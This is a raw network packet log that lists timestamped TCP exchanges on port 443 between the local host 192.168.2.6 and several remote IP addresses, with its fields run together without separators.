                                                                                                                                                                      Nov 21, 2024 06:23:17.336617947 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.336671114 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.344374895 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.344454050 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.344475031 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.352849960 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.352911949 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.352927923 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.360989094 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.361053944 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.361068010 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.415361881 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.455409050 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.509049892 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.509069920 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.536823034 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.536907911 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.536932945 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.536993980 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.537065029 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.537158966 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.537198067 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.537225008 CET49711443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.537241936 CET44349711188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.714698076 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.714780092 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:17.714899063 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.715276957 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:17.715348005 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.512959957 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.513103962 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:18.515216112 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:18.515238047 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.515728951 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.526392937 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:18.571335077 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.971821070 CET44349704173.222.162.64192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.972071886 CET49704443192.168.2.6173.222.162.64
                                                                                                                                                                      Nov 21, 2024 06:23:18.984189034 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.984400988 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:18.985538960 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:18.985548019 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.985788107 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.987008095 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:18.987162113 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:18.987195969 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.995362043 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.995428085 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.995471954 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.995528936 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:18.995573997 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:18.995603085 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:18.995628119 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.190397024 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.190463066 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.190644026 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.190644026 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.190684080 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.190740108 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.240514994 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.240545988 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.240827084 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.240842104 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.240904093 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.370358944 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.370415926 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.370472908 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.370472908 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.370512962 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.370563030 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.408541918 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.408591986 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.408632994 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.408662081 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.408690929 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.408710957 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.429940939 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.429990053 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.430023909 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.430038929 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.430068016 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.430087090 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.448426962 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.448487043 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.448522091 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.448569059 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.448604107 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.448630095 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.563013077 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.563088894 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.563368082 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.563369036 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.563441038 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.563523054 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.580943108 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.580988884 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.581049919 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.581058979 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.581130028 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.581130028 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.597716093 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.597759008 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.597816944 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.597830057 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.597997904 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.597999096 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.609215021 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.609256983 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.609313011 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.609325886 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.609359026 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.609380007 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.619869947 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.619950056 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.620012999 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.620026112 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.620201111 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.620321035 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.630038023 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.630083084 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.630189896 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.630211115 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.630357981 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.630358934 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.634767056 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.634896994 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.634903908 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.634927034 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.634953976 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.634980917 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.635023117 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.635039091 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.696825027 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.696882963 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.697164059 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.698338985 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.698376894 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.698450089 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.699063063 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.699105978 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.699167013 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.699387074 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.699404955 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.699485064 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.699501991 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.700345039 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.700383902 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.700490952 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.700501919 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.700521946 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.700572014 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.700583935 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.709314108 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.709328890 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.709403038 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.709563971 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:19.709573984 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.870637894 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.870940924 CET44349713188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:19.871047974 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:19.871776104 CET49713443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:20.041048050 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:20.041121006 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:20.041213989 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:20.041613102 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:20.041635036 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:20.761472940 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:20.761569977 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:20.761648893 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:20.762583017 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:20.762620926 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.306978941 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.307086945 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:21.308770895 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:21.308778048 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.309114933 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.310436010 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:21.310606956 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:21.310643911 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.310713053 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:21.351363897 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.427412987 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.427983999 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.428050041 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.428632975 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.428648949 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.494940996 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.495609999 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.495662928 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.495970011 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.495989084 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.496861935 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.497153997 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.497172117 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.497487068 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.497493029 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.501013041 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.501306057 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.501338959 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.501631975 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.501645088 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.503091097 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.503529072 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.503562927 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.503901005 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.503914118 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.870079994 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.870141983 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.870214939 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.870237112 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.870321989 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.870516062 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.870533943 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.870568991 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.870932102 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.871011972 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.871073008 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.873708010 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.873743057 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.873828888 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.874073029 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.874088049 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.937844992 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.938007116 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.938100100 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.938205004 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.938252926 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.938282967 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.938297987 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.940839052 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.940872908 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.940973997 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.941262960 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.941277027 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.944919109 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.944993973 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.945058107 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.945180893 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.945197105 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.945209980 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.945214987 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.947504997 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.947526932 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.947603941 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.947791100 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.947805882 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.948100090 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.948158026 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.948230028 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.948299885 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.948432922 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.948484898 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.948512077 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.949202061 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.949664116 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.949731112 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950223923 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950253963 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950329065 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950355053 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950411081 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950496912 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950496912 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950512886 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950598955 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950630903 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950694084 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950710058 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.950733900 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.950786114 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.951105118 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.951126099 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.952605009 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.952689886 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:21.952786922 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.952934027 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:21.952970028 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.280240059 CET44349719188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.280464888 CET49719443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:22.517903090 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.517993927 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:22.521346092 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:22.521375895 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.521740913 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.523761034 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:22.523828030 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:22.523842096 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.523953915 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:22.565728903 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:22.565763950 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.565848112 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:22.566155910 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:22.566174030 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:22.567353964 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.035907984 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.036015034 CET4434972040.113.110.67192.168.2.6
